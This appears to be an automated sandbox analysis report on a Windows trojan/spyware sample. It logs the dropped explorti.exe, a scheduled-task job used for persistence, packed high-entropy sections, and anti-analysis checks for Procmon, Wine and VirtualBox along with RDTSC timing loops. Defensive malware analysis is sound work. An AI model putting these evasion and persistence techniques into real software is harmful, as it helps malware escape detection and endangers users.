Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_003EE410 1_2_003EE410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_003E4CD0 1_2_003E4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_00417D63 1_2_00417D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_0042763B 1_2_0042763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_00426EE9 1_2_00426EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_003E4AD0 1_2_003E4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_0042775B 1_2_0042775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_00428700 1_2_00428700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_00422BB0 1_2_00422BB0
Source: Jl5yg1Km2s.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Jl5yg1Km2s.exe Static PE information: Section: ZLIB complexity 0.9978921191939891
Source: Jl5yg1Km2s.exe Static PE information: Section: cqehubfu ZLIB complexity 0.9945843322554268
Source: explorti.exe.0.dr Static PE information: Section: ZLIB complexity 0.9978921191939891
Source: explorti.exe.0.dr Static PE information: Section: cqehubfu ZLIB complexity 0.9945843322554268
Source: explorti.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: Jl5yg1Km2s.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Jl5yg1Km2s.exe ReversingLabs: Detection: 78%
Source: Jl5yg1Km2s.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe File read: C:\Users\user\Desktop\Jl5yg1Km2s.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Jl5yg1Km2s.exe "C:\Users\user\Desktop\Jl5yg1Km2s.exe"
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Jl5yg1Km2s.exe Static file information: File size 1924608 > 1048576
Source: Jl5yg1Km2s.exe Static PE information: Raw size of cqehubfu is bigger than: 0x100000 < 0x1a4600

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Unpacked PE file: 0.2.Jl5yg1Km2s.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cqehubfu:EW;gcjpmbpo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cqehubfu:EW;gcjpmbpo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 6.2.explorti.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cqehubfu:EW;gcjpmbpo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cqehubfu:EW;gcjpmbpo:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: explorti.exe.0.dr Static PE information: real checksum: 0x1e1da4 should be: 0x1d63c5
Source: Jl5yg1Km2s.exe Static PE information: real checksum: 0x1e1da4 should be: 0x1d63c5
Source: Jl5yg1Km2s.exe Static PE information: section name:
Source: Jl5yg1Km2s.exe Static PE information: section name: .idata
Source: Jl5yg1Km2s.exe Static PE information: section name:
Source: Jl5yg1Km2s.exe Static PE information: section name: cqehubfu
Source: Jl5yg1Km2s.exe Static PE information: section name: gcjpmbpo
Source: Jl5yg1Km2s.exe Static PE information: section name: .taggant
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: cqehubfu
Source: explorti.exe.0.dr Static PE information: section name: gcjpmbpo
Source: explorti.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_003FD82C push ecx; ret 1_2_003FD83F
Source: Jl5yg1Km2s.exe Static PE information: section name: entropy: 7.97975540171384
Source: Jl5yg1Km2s.exe Static PE information: section name: cqehubfu entropy: 7.9529251999211485
Source: explorti.exe.0.dr Static PE information: section name: entropy: 7.97975540171384
Source: explorti.exe.0.dr Static PE information: section name: cqehubfu entropy: 7.9529251999211485
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: A6F29F second address: A6F2BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: A6F2BF second address: A6EB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F1CC8B8C9F0h 0x0000000e push dword ptr [ebp+122D1585h] 0x00000014 xor dword ptr [ebp+122D1ED3h], edx 0x0000001a call dword ptr [ebp+122D1BDCh] 0x00000020 pushad 0x00000021 jc 00007F1CC8B8C9E7h 0x00000027 clc 0x00000028 xor eax, eax 0x0000002a cmc 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f sub dword ptr [ebp+122D1E72h], edx 0x00000035 mov dword ptr [ebp+122D2B3Bh], eax 0x0000003b mov dword ptr [ebp+122D1E72h], edx 0x00000041 mov dword ptr [ebp+122D2EACh], ebx 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007F1CC8B8C9F9h 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 jmp 00007F1CC8B8C9F4h 0x0000005a stc 0x0000005b lodsw 0x0000005d mov dword ptr [ebp+122D2EACh], edi 0x00000063 sub dword ptr [ebp+122D1E72h], ecx 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jl 00007F1CC8B8C9E7h 0x00000073 clc 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 clc 0x00000079 jp 00007F1CC8B8C9ECh 0x0000007f mov dword ptr [ebp+122D2E13h], edx 0x00000085 nop 0x00000086 push eax 0x00000087 push edx 0x00000088 push edx 0x00000089 pushad 0x0000008a popad 0x0000008b pop edx 0x0000008c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: A6EB20 second address: A6EB36 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1CC8BB7C3Ch 0x00000008 jno 00007F1CC8BB7C36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: A6EB36 second address: A6EB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9EDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: A6EB48 second address: A6EB4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: A6EB4E second address: A6EB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE7486 second address: BE748C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE748C second address: BE7490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE675A second address: BE6763 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE9BF5 second address: BE9BFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE9BFA second address: A6EB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 37766346h 0x0000000e push dword ptr [ebp+122D1585h] 0x00000014 movzx edi, bx 0x00000017 call dword ptr [ebp+122D1BDCh] 0x0000001d pushad 0x0000001e jc 00007F1CC8BB7C37h 0x00000024 clc 0x00000025 xor eax, eax 0x00000027 cmc 0x00000028 mov edx, dword ptr [esp+28h] 0x0000002c sub dword ptr [ebp+122D1E72h], edx 0x00000032 mov dword ptr [ebp+122D2B3Bh], eax 0x00000038 mov dword ptr [ebp+122D1E72h], edx 0x0000003e mov dword ptr [ebp+122D2EACh], ebx 0x00000044 mov esi, 0000003Ch 0x00000049 jmp 00007F1CC8BB7C49h 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 jmp 00007F1CC8BB7C44h 0x00000057 stc 0x00000058 lodsw 0x0000005a mov dword ptr [ebp+122D2EACh], edi 0x00000060 sub dword ptr [ebp+122D1E72h], ecx 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a jl 00007F1CC8BB7C37h 0x00000070 clc 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 clc 0x00000076 jp 00007F1CC8BB7C3Ch 0x0000007c mov dword ptr [ebp+122D2E13h], edx 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 push edx 0x00000086 pushad 0x00000087 popad 0x00000088 pop edx 0x00000089 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE9C3B second address: BE9C83 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 nop 0x00000018 mov dword ptr [ebp+122D209Dh], edi 0x0000001e push 00000000h 0x00000020 pushad 0x00000021 sub dword ptr [ebp+122D1830h], esi 0x00000027 sub bh, 0000006Fh 0x0000002a popad 0x0000002b mov edx, dword ptr [ebp+122D1EC5h] 0x00000031 call 00007F1CC8B8C9E9h 0x00000036 push eax 0x00000037 push edx 0x00000038 jc 00007F1CC8B8C9ECh 0x0000003e jg 00007F1CC8B8C9E6h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE9C83 second address: BE9CDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jo 00007F1CC8BB7C36h 0x00000012 jne 00007F1CC8BB7C36h 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007F1CC8BB7C44h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 popad 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 pushad 0x00000028 jnc 00007F1CC8BB7C3Ch 0x0000002e pushad 0x0000002f jmp 00007F1CC8BB7C3Dh 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE9CDB second address: BE9D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 je 00007F1CC8B8C9F3h 0x0000000e jmp 00007F1CC8B8C9EDh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 jng 00007F1CC8B8C9ECh 0x0000001e pop ecx 0x0000001f pop eax 0x00000020 jmp 00007F1CC8B8C9F7h 0x00000025 push 00000003h 0x00000027 movzx ecx, si 0x0000002a push 00000000h 0x0000002c cmc 0x0000002d mov ch, dl 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F1CC8B8C9E8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b movzx edx, si 0x0000004e movzx edi, si 0x00000051 push 9A5FCAE0h 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F1CC8B8C9F6h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE9D6E second address: BE9DBA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1CC8BB7C3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 25A03520h 0x00000011 call 00007F1CC8BB7C3Fh 0x00000016 mov edi, ebx 0x00000018 pop esi 0x00000019 lea ebx, dword ptr [ebp+1244EB16h] 0x0000001f mov edx, dword ptr [ebp+122D2A8Fh] 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F1CC8BB7C44h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE9DBA second address: BE9DBF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE9E27 second address: BE9E8B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov si, 4AA3h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F1CC8BB7C38h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d push ebx 0x0000002e sub ecx, 4BBD619Bh 0x00000034 pop esi 0x00000035 xor cx, 5FDEh 0x0000003a call 00007F1CC8BB7C39h 0x0000003f push edx 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 pop edx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b jmp 00007F1CC8BB7C3Eh 0x00000050 pop ecx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE9E8B second address: BE9EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F1CC8B8C9E6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1CC8B8C9EBh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE9EA8 second address: BE9F3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jg 00007F1CC8BB7C36h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f je 00007F1CC8BB7C4Bh 0x00000015 jmp 00007F1CC8BB7C45h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 jmp 00007F1CC8BB7C40h 0x00000025 jmp 00007F1CC8BB7C3Bh 0x0000002a popad 0x0000002b pop eax 0x0000002c mov edi, dword ptr [ebp+122D2B0Fh] 0x00000032 push 00000003h 0x00000034 ja 00007F1CC8BB7C39h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F1CC8BB7C38h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 stc 0x00000057 push 00000003h 0x00000059 mov ecx, dword ptr [ebp+122D2CBCh] 0x0000005f push C46FF89Ch 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE9F3B second address: BE9F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BE9F3F second address: BE9F49 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
